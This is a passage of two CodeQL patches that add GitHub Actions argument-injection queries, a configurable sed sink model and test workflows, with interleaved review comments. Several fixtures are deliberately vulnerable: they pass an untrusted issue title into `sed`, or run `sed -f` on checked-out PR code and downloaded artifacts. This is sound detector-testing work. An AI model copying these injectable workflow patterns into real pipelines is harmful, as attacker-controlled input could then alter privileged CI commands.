From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Jul 2024 15:35:51 +0200 Subject: [PATCH 0394/1267] Initial implementation Pending work: complete the regular expression --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 71 +++++++++++------- .../security/ArgumentInjectionQuery.qll | 73 +++++++++++++++++++ .../security/EnvPathInjectionQuery.qll | 2 +- .../actions/security/EnvVarInjectionQuery.qll | 2 +- ql/lib/ext/config/poisonable_steps.yml | 1 - .../CWE-094/ArgumentInjectionCritical.ql | 26 +++++++ .../CWE-094/ArgumentInjectionMedium.ql | 26 +++++++ .../Security/CWE-094/CodeInjectionCritical.ql | 1 - .../Security/CWE-094/CodeInjectionMedium.ql | 1 - .../.github/workflows/arg_injection.yml | 20 +++++ .../ArgumentInjectionCritical.expected | 8 ++ .../CWE-094/ArgumentInjectionCritical.qlref | 1 + .../CWE-094/ArgumentInjectionMedium.expected | 7 ++ .../CWE-094/ArgumentInjectionMedium.qlref | 1 + 14 files changed, 208 insertions(+), 32 deletions(-) create mode 100644 ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll create mode 100644 ql/src/Security/CWE-094/ArgumentInjectionCritical.ql create mode 100644 ql/src/Security/CWE-094/ArgumentInjectionMedium.ql create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml create mode 100644 ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected create mode 100644 ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref create mode 100644 ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected create mode 100644 ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 46c42da2652..ca0b7a70159 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
@@ -8,6 +8,7 @@ private import codeql.actions.DataFlow private import codeql.actions.dataflow.FlowSources private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.ArgumentInjectionQuery /** * A unit class for adding additional taint steps. 
@@ -23,6 +24,42 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } +bindingset[var_name, value] +predicate envToRunExpr(string var_name, Run run, string value) { + // e.g. echo "FOO=$BODY" >> $GITHUB_ENV + // e.g. echo "FOO=${BODY}" >> $GITHUB_ENV + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + // e.g. echo "FOO=$(echo $BODY)" >> $GITHUB_ENV + value.matches("$(echo %") and value.indexOf(var_name) > 0 + or + // e.g. + // FOO=$(echo $BODY) + // echo "FOO=$FOO" >> $GITHUB_ENV + exists(string line, string var2_name, string var2_value | run.getScript().splitAt("\n") = line | + var2_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var2_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + var2_value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") and + ( + value.matches("%$" + ["", "{", "ENV{"] + var2_name + "%") + or + value.matches("$(echo %") and value.indexOf(var2_name) > 0 + ) + ) +} + +bindingset[var_name] +predicate envToArgInjSink(string var_name, Run run, string command) { + exists(string argument, string line, string regexp, int command_group, int argument_group | + run.getScript().splitAt("\n") = line and + argumentInjectionSinks(regexp, command_group, argument_group) and + argument = line.regexpCapture(regexp, argument_group) and + command = line.regexpCapture(regexp, command_group) and + envToRunExpr(var_name, run, argument) and + exists(run.getInScopeEnvVarExpr(var_name)) + ) +} + /** * Holds if an env var is passed to a Run step and this Run step, writes its value to a special workflow file. * - file is the name of the special workflow file: GITHUB_ENV, GITHUB_OUTPUT, GITHUB_PATH 
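Review bot: `envToRunExpr` and `envToArgInjSink` are added without QLDoc, while the neighbouring `envToSpecialFile` documents its parameters with examples; `envToArgInjSink` in particular needs a line saying that `command` is the text captured by the `argumentInjectionSinks` regexp and that `var_name` is the env var found in its argument group. `regexpCapture` has to match the whole line, so the sink patterns must allow for leading indentation and trailing text, which is presumably part of the regular-expression work the commit message lists as pending. In `envToRunExpr` the `matches` patterns are built by concatenating `var_name`, so an `_` in the name acts as a single-character wildcard and `$BODY` also matches inside a longer name such as `$BODY_OTHER`; that over-approximation is worth stating in the doc now that it also decides argument-injection results.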
@@ -34,7 +71,7 @@ class AdditionalTaintStep extends Unit { * e.g. path (special name) for `echo "$BODY" >> $GITHUB_PATH` */ bindingset[var_name] -predicate envToRunFlow(string file, string var_name, Run run, string key) { +predicate envToSpecialFile(string file, string var_name, Run run, string key) { exists(string content, string value | ( file = "GITHUB_ENV" and @@ -50,30 +87,7 @@ predicate envToRunFlow(string file, string var_name, Run run, string key) { key = "path" and value = content ) and - ( - // e.g. echo "FOO=$BODY" >> $GITHUB_ENV - // e.g. echo "FOO=${BODY}" >> $GITHUB_ENV - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - // e.g. echo "FOO=$(echo $BODY)" >> $GITHUB_ENV - value.matches("$(echo %") and value.indexOf(var_name) > 0 - or - // e.g. - // FOO=$(echo $BODY) - // echo "FOO=$FOO" >> $GITHUB_ENV - exists(string line, string var2_name, string var2_value | - run.getScript().splitAt("\n") = line - | - var2_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var2_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and - var2_value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") and - ( - value.matches("%$" + ["", "{", "ENV{"] + var2_name + "%") - or - value.matches("$(echo %") and value.indexOf(var2_name) > 0 - ) - ) - ) + envToRunExpr(var_name, run, value) ) } @@ -89,7 +103,10 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Run run, string var_name | run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and succ.asExpr() = run.getScriptScalar() and - envToRunFlow(["GITHUB_ENV", "GITHUB_PATH"], var_name, run, _) + ( + envToSpecialFile(["GITHUB_ENV", "GITHUB_PATH"], var_name, run, _) or + envToArgInjSink(var_name, run, _) + ) ) } 
@@ -110,7 +127,7 @@ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlo exists(Run run, string var_name, string key | run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and succ.asExpr() = run and - envToRunFlow("GITHUB_OUTPUT", var_name, run, key) and + envToSpecialFile("GITHUB_OUTPUT", var_name, run, key) and c = any(DataFlow::FieldContent ct | ct.getName() = key) ) } diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll new file mode 100644 index 00000000000..be80cb3295d --- /dev/null +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll 
@@ -0,0 +1,73 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.FlowSteps +import codeql.actions.DataFlow + +abstract class ArgumentInjectionSink extends DataFlow::Node { + abstract string getCommand(); +} + +/** + * Holds if a Run step declares an environment variable with contents from a local file. + * e.g. + * run: | + * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV + * echo "sha=$(> $GITHUB_ENV + *class ArgumentInjectionFromFileReadSink extends ArgumentInjectionSink { + * ArgumentInjectionFromFileReadSink() { + * exists(Run run, UntrustedArtifactDownloadStep step, string content, string value | + * this.asExpr() = run.getScriptScalar() and + * step.getAFollowingStep() = run and + * writeToGitHubEnv(run, content) and + * extractVariableAndValue(content, _, value) and + * outputsPartialFileContent(value) + * ) + * } + *} + */ +predicate argumentInjectionSinks(string regexp, int command_group, int argument_group) { + regexp = ".*(sed) (.*)" and command_group = 1 and argument_group = 2 +} + +/** + * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. + * e.g. 
+ * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * sed "s/FOO/$BODY/g" > /tmp/foo + */ +class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { + string command; + + ArgumentInjectionFromEnvVarSink() { + exists(Run run, string var_name | + envToArgInjSink(var_name, run, command) and + exists(run.getInScopeEnvVarExpr(var_name)) and + run.getScriptScalar() = this.asExpr() + ) + } + + override string getCommand() { result = command } +} + +class ArgumentInjectionFromMaDSink extends ArgumentInjectionSink { + ArgumentInjectionFromMaDSink() { externallyDefinedSink(this, "argument-injection") } + + override string getCommand() { result = "unknown" } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate a code script. + */ +private module ArgumentInjectionConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof ArgumentInjectionSink } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */ +module ArgumentInjectionFlow = TaintTracking::Global; diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index cbdf9a917ce..e81c6954d72 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -36,7 +36,7 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { EnvPathInjectionFromEnvVarSink() { exists(Run run, string var_name | - envToRunFlow("GITHUB_PATH", var_name, run, _) and + envToSpecialFile("GITHUB_PATH", var_name, run, _) and exists(run.getInScopeEnvVarExpr(var_name)) and run.getScriptScalar() = this.asExpr() ) 
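Review bot: The sink pattern `".*(sed) (.*)"` in `argumentInjectionSinks` has no boundary before `sed` and captures the rest of the line as the argument. A line such as `echo "unused $TITLE"` or `sed s/a/b/ f | grep "$TITLE"` is therefore reported as a `sed` argument injection, which sits badly with the `@precision very-high` declared in ArgumentInjectionCritical.ql. Anchoring the command to a token start, for example `regexp = "(?:.*[\\s;&|(])?(sed)\\s+(.*)"` (the capture groups keep their numbers), removes the substring case; the pipeline case would additionally need the argument group to stop at shell separators. The same pattern is carried unchanged into `argument_injection_sinks.yml` by the follow-up commit. Separately, the QLDoc above this predicate describes a file-read sink and wraps a commented-out class, and the `ArgumentInjectionConfig` comment still speaks of "a code script"; both should describe argument injection.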
diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 5a3dbebc512..86913421563 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -38,7 +38,7 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { exists(Run run, string var_name | - envToRunFlow("GITHUB_ENV", var_name, run, _) and + envToSpecialFile("GITHUB_ENV", var_name, run, _) and exists(run.getInScopeEnvVarExpr(var_name)) and run.getScriptScalar() = this.asExpr() ) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index f9274f54872..07fc7c7af73 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -46,7 +46,6 @@ extensions: - ["rails\\s+db:create"] - ["rails\\s+assets:precompile"] - ["rubocop"] - - ["sed\\s+-e"] - ["sed\\s+-f"] - ["stylelint"] - ["terraform"] diff --git a/ql/src/Security/CWE-094/ArgumentInjectionCritical.ql b/ql/src/Security/CWE-094/ArgumentInjectionCritical.ql new file mode 100644 index 00000000000..e56f613fac4 --- /dev/null +++ b/ql/src/Security/CWE-094/ArgumentInjectionCritical.ql 
@@ -0,0 +1,26 @@ +/** + * @name Argument injection + * @description Passing unsanitized user input to a command that will run it as a subprocess. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision very-high + * @id actions/argument-injection/critical + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.security.ArgumentInjectionQuery +import ArgumentInjectionFlow::PathGraph + +from ArgumentInjectionFlow::PathNode source, ArgumentInjectionFlow::PathNode sink +where + ArgumentInjectionFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr()) +select sink.getNode(), source, sink, + "Potential argument injection in $@ command, which may be controlled by an external user.", sink, + sink.getNode().(ArgumentInjectionSink).getCommand() diff --git a/ql/src/Security/CWE-094/ArgumentInjectionMedium.ql b/ql/src/Security/CWE-094/ArgumentInjectionMedium.ql new file mode 100644 index 00000000000..66c51ae3673 --- /dev/null +++ b/ql/src/Security/CWE-094/ArgumentInjectionMedium.ql 
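Review bot: The `@tags` block lists CWE-094, CWE-095 and CWE-116 but not CWE-088, the weakness entry for argument injection, so results will not be grouped under the weakness the query is named after; adding ` *       external/cwe/cwe-088` covers it. The `@description` ("a command that will run it as a subprocess") reads as command injection rather than argument injection; I would reword it to `@description Using user-controlled input in the arguments of a command may change how that command behaves.` ArgumentInjectionMedium.ql has the same header and needs the same two changes.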
@@ -0,0 +1,26 @@ +/** + * @name Argument injection + * @description Passing unsanitized user input to a command that will run it as a subprocess. + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision medium + * @id actions/argument-injection/medium + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.security.ArgumentInjectionQuery +import ArgumentInjectionFlow::PathGraph + +from ArgumentInjectionFlow::PathNode source, ArgumentInjectionFlow::PathNode sink +where + ArgumentInjectionFlow::flowPath(source, sink) and + inNonPrivilegedContext(sink.getNode().asExpr()) +select sink.getNode(), source, sink, + "Potential argument injection in $@ command, which may be controlled by an external user.", sink, + sink.getNode().(ArgumentInjectionSink).getCommand() diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index f37c374658a..9319718b7fc 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -17,7 +17,6 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph -import codeql.actions.security.ControlChecks from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.ql b/ql/src/Security/CWE-094/CodeInjectionMedium.ql index 43f4eb9c38a..0f8b6e13a29 100644 --- a/ql/src/Security/CWE-094/CodeInjectionMedium.ql +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.ql @@ -17,7 +17,6 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph -import codeql.actions.security.ControlChecks from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where 
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml new file mode 100644 index 00000000000..b5478a5e136 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml @@ -0,0 +1,20 @@ +name: Argument injection + +on: + issues: + types: [opened, edited] + +jobs: + test1: + runs-on: ubuntu-latest + env: + TITLE: ${{github.event.issue.title}} + steps: + - run: | + echo "s/FOO/$TITLE/g" + - run: | + sed "s/FOO/$TITLE/g" + + + + diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected new file mode 100644 index 00000000000..5b82e52682e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected @@ -0,0 +1,8 @@ +edges +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | provenance | | +nodes +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | semmle.label | sed "s/FOO/$TITLE/g"\n | +subpaths +#select +| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | sed | diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref new file mode 100644 index 00000000000..6b3e2fd9f62 --- /dev/null 
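Review bot: The fixture has one negative step and one positive step, both using the bare `$TITLE` form. The `${TITLE}` and indirect-assignment branches of `envToRunExpr` are therefore never exercised on the new sink path, and nothing pins down how the sink pattern behaves when `sed` appears inside another word. The only trigger is `issues`, which the Critical result indicates is treated as privileged, so ArgumentInjectionMedium.expected has an empty `#select` and the medium query has no positive case. I would add a step `- run: sed "s/FOO/${TITLE}/g"`, a negative step `- run: echo "unused $TITLE"`, and a second workflow with a non-privileged trigger.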
+++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-094/ArgumentInjectionCritical.ql diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected new file mode 100644 index 00000000000..37fd97270d7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected @@ -0,0 +1,7 @@ +edges +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | provenance | | +nodes +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | semmle.label | sed "s/FOO/$TITLE/g"\n | +subpaths +#select diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref new file mode 100644 index 00000000000..b9c4ae95e43 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-094/ArgumentInjectionMedium.ql From 732f0dc29fb2fe9ab81941a0e228bbfad98f2b40 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 10:03:25 +0200 Subject: [PATCH 0395/1267] feat(queries): Argument Injection Make argument injection sinks congigurable with MaD --- ql/lib/codeql/actions/config/Config.qll | 15 +++++++++-- .../actions/config/ConfigExtensions.qll | 6 +++++ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 3 +-- .../security/ArgumentInjectionQuery.qll | 25 +++---------------- .../ext/config/argument_injection_sinks.yml | 8 ++++++ .../.github/workflows/artifactpoisoning7.yml | 1 + .../.github/workflows/artifactpoisoning8.yml | 18 +++++++++++++ .../CWE-829/.github/workflows/test9.yml | 18 +++++++++++++ .../ArtifactPoisoningCritical.expected | 4 +++ .../CWE-829/ArtifactPoisoningMedium.expected | 3 +++ .../CWE-829/UnpinnedActionsTag.expected | 3 ++- .../UntrustedCheckoutCritical.expected | 9 ++++--- 12 files changed, 83 insertions(+), 30 deletions(-) create mode 100644 ql/lib/ext/config/argument_injection_sinks.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning8.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index dd63fda93d1..1cc8ce4eb8a 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -46,7 +46,7 @@ predicate externallyTriggerableEventsDataModel(string event) { } /** - * MaD models for poisonable commands + * MaD models for poisonable commands * Fields: * - regexp: Regular expression for matching poisonable commands */ @@ -74,7 +74,7 @@ predicate poisonableActionsDataModel(string action) { } /** - * MaD models for for event properties that can be user-controlled. + * MaD models for event properties that can be user-controlled. * Fields: * - property: event property * - kind: property kind 
@@ -82,3 +82,14 @@ predicate poisonableActionsDataModel(string action) { predicate untrustedEventPropertiesDataModel(string property, string kind) { Extensions::untrustedEventPropertiesDataModel(property, kind) } + +/** + * MaD models for arguments to commands that execute the given argument. + * Fields: + * - regexp: Regular expression for matching argument injections. + * - command_group: capture group for the command. + * - argument_group: capture group for the argument. + */ +predicate argumentInjectionSinksDataModel(string regexp, int command_group, int argument_group) { + Extensions::argumentInjectionSinksDataModel(regexp, command_group, argument_group) +} diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll index 26e77ce7235..4a492edeadf 100644 --- a/ql/lib/codeql/actions/config/ConfigExtensions.qll +++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -44,3 +44,9 @@ extensible predicate poisonableActionsDataModel(string action); */ extensible predicate untrustedEventPropertiesDataModel(string property, string kind); +/** + * Holds for arguments to commands that execute the given argument + */ +extensible predicate argumentInjectionSinksDataModel( + string regexp, int command_group, int argument_group +); diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index ca0b7a70159..a40e11bda95 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -8,7 +8,6 @@ private import codeql.actions.DataFlow private import codeql.actions.dataflow.FlowSources private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery -private import codeql.actions.security.ArgumentInjectionQuery /** * A unit class for adding additional taint steps. 
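Review bot: The QLDoc for `argumentInjectionSinksDataModel` does not say what the regular expression is matched against. In `envToArgInjSink` it is passed to `line.regexpCapture(...)` for each line of the run script, which only yields a result when the whole line matches. A model row written without a leading `.*` would therefore silently match nothing unless the command starts the line. I would change the field description to `- regexp: Regular expression matched against one complete line of a Run step's script; it must match the whole line.` and state that `command_group` and `argument_group` are the capture-group numbers handed to `regexpCapture`.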
@@ -52,7 +51,7 @@ bindingset[var_name] predicate envToArgInjSink(string var_name, Run run, string command) { exists(string argument, string line, string regexp, int command_group, int argument_group | run.getScript().splitAt("\n") = line and - argumentInjectionSinks(regexp, command_group, argument_group) and + argumentInjectionSinksDataModel(regexp, command_group, argument_group) and argument = line.regexpCapture(regexp, argument_group) and command = line.regexpCapture(regexp, command_group) and envToRunExpr(var_name, run, argument) and diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index be80cb3295d..bf29a1c8458 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -9,28 +9,6 @@ abstract class ArgumentInjectionSink extends DataFlow::Node { abstract string getCommand(); } -/** - * Holds if a Run step declares an environment variable with contents from a local file. - * e.g. - * run: | - * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV - * echo "sha=$(> $GITHUB_ENV - *class ArgumentInjectionFromFileReadSink extends ArgumentInjectionSink { - * ArgumentInjectionFromFileReadSink() { - * exists(Run run, UntrustedArtifactDownloadStep step, string content, string value | - * this.asExpr() = run.getScriptScalar() and - * step.getAFollowingStep() = run and - * writeToGitHubEnv(run, content) and - * extractVariableAndValue(content, _, value) and - * outputsPartialFileContent(value) - * ) - * } - *} - */ -predicate argumentInjectionSinks(string regexp, int command_group, int argument_group) { - regexp = ".*(sed) (.*)" and command_group = 1 and argument_group = 2 -} - /** * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. * e.g. 
@@ -53,6 +31,9 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { override string getCommand() { result = command } } +/** + * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. + */ class ArgumentInjectionFromMaDSink extends ArgumentInjectionSink { ArgumentInjectionFromMaDSink() { externallyDefinedSink(this, "argument-injection") } diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml new file mode 100644 index 00000000000..8a9350cfebb --- /dev/null +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: argumentInjectionSinksDataModel + # https://gtfobins.github.io/ + data: + - [".*(sed) (.*)", 1, 2] + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml index e815c3dd129..63acdc612b0 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml @@ -4,6 +4,7 @@ on: workflow_run jobs: my-second-job: + runs-on: ubuntu-latest steps: - name: download pr artifact uses: dawidd6/action-download-artifact@v2 diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning8.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning8.yml new file mode 100644 index 00000000000..8cb380ae043 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning8.yml 
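Review bot: The QLDoc added to `ArgumentInjectionFromMaDSink` is a copy of the comment on `ArgumentInjectionFromEnvVarSink` and does not describe this class, whose characteristic predicate is `externallyDefinedSink(this, "argument-injection")` and involves no environment variable. It also uses the "Holds if" form, which belongs on predicates rather than classes. Suggested text: `/** An argument injection sink declared through an external model (MaD) with kind "argument-injection". */`.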
@@ -0,0 +1,18 @@ +# Second Workflow +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + - name: Use artifact + run: | + sed -f config foo.md > bar.md diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml new file mode 100644 index 00000000000..6f7ff665be3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml @@ -0,0 +1,18 @@ +name: OpenAPI +on: + pull_request_target: + +permissions: {} + +jobs: + base: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6 + with: + ref: ${{ github.event.pull_request.head.sha }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + fetch-depth: 0 + - run: + sed -f script/config foo.md > bar.md + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index c6733eb66b8..6b9b0f670f3 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected 
@@ -1,4 +1,5 @@ edges +| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | @@ -13,6 +14,8 @@ edges | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | nodes +| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | 